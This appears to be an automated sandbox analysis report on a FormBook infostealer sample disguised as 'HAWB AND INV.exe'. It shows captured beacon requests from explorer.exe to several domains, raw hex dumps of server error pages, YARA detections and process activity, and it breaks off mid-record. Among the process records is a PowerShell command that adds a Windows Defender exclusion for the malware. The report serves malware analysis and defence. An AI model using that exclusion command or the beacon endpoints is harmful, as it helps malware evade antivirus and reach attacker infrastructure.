                                                                    Server: openresty
                                                                    Date: Mon, 03 May 2021 12:53:41 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "6089be8c-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.649757202.254.234.15280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:53:46.949692011 CEST11185OUTGET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.premier-moment.info
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:47.265083075 CEST11191INHTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Mon, 03 May 2021 12:53:47 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 347
                                                                    Connection: close
                                                                    Location: https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 6d 69 65 72 2d 6d 6f 6d 65 6e 74 2e 69 6e 66 6f 2f 6d 61 77 39 2f 3f 41 56 46 3d 36 2b 63 39 57 77 41 39 31 76 63 33 71 31 71 50 56 2f 62 78 64 62 34 6a 4c 43 77 66 72 42 6f 36 6d 6b 47 41 6a 58 65 64 6d 4d 4d 65 61 57 71 4e 56 54 4e 4f 4a 33 33 6c 45 57 37 72 4d 54 59 54 30 45 7a 78 57 37 37 64 43 67 3d 3d 26 61 6d 70 3b 36 6c 3d 73 48 62 4c 70 64 77 38 78 30 4e 78 34 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&amp;6l=sHbLpdw8x0Nx4">here</a>.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.649760181.214.142.280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:53:52.576576948 CEST11193OUTGET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.ecosanhn.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:52.709163904 CEST11194INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Date: Mon, 03 May 2021 12:53:52 GMT
                                                                    Server: LiteSpeed
                                                                    Data Raw: 32 38 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30
                                                                    Data Ascii: 2872<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #0000
                                                                    May 3, 2021 14:53:52.709183931 CEST11196INData Raw: 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b
                                                                    Data Ascii: 00; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additio
                                                                    May 3, 2021 14:53:52.709220886 CEST11197INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0a
                                                                    Data Ascii: } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright {
                                                                    May 3, 2021 14:53:52.709239006 CEST11199INData Raw: 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c
                                                                    Data Ascii: n: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBOR
                                                                    May 3, 2021 14:53:52.709256887 CEST11200INData Raw: 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63
                                                                    Data Ascii: B+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY
                                                                    May 3, 2021 14:53:52.709278107 CEST11201INData Raw: 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46
                                                                    Data Ascii: QEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICM
                                                                    May 3, 2021 14:53:52.709296942 CEST11203INData Raw: 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e
                                                                    Data Ascii: +QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==);
                                                                    May 3, 2021 14:53:52.709311962 CEST11204INData Raw: 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.ecosanhn.com/cp_errordocument.shtml (port 80) </div>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.64976234.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:54:02.857573986 CEST11237OUTGET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.curvygirlholiday.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:54:02.995352030 CEST11238INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Mon, 03 May 2021 12:54:02 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "608f64c6-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.649763107.180.57.11980C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    May 3, 2021 14:54:13.310914993 CEST11240OUTGET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.networkingmaderas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:54:13.470249891 CEST11241INHTTP/1.1 404 Not Found
                                                                    Date: Mon, 03 May 2021 12:54:13 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Accept-Ranges: bytes
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Length: 1699
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75
                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou
                                                                    May 3, 2021 14:54:13.470271111 CEST11242INData Raw: 6e 64 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 66 66 38 61 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 38 22 20 2f 3e 0a 20 20 20 20 3c 74 65 78 74 20 78 3d 22 34 32 22 20 79 3d 22 37 34 22 20 66 69 6c
                                                                    Data Ascii: nd" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-weight="900" font-size="42px">!</text> </svg> <div class="row"> <div class="col-md-12"> <div class="main-i


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: HAWB AND INV.exe PID: 6752 Parent PID: 6012

                                                                    General

                                                                    Start time:14:52:19
                                                                    Start date:03/05/2021
                                                                    Path:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\HAWB AND INV.exe'
                                                                    Imagebase:0x970000
                                                                    File size:741376 bytes
                                                                    MD5 hash:42662765A94CE5ECE11529509F937711
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: powershell.exe PID: 6932 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:24
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 6948 Parent PID: 6932

                                                                    General

                                                                    Start time:14:52:24
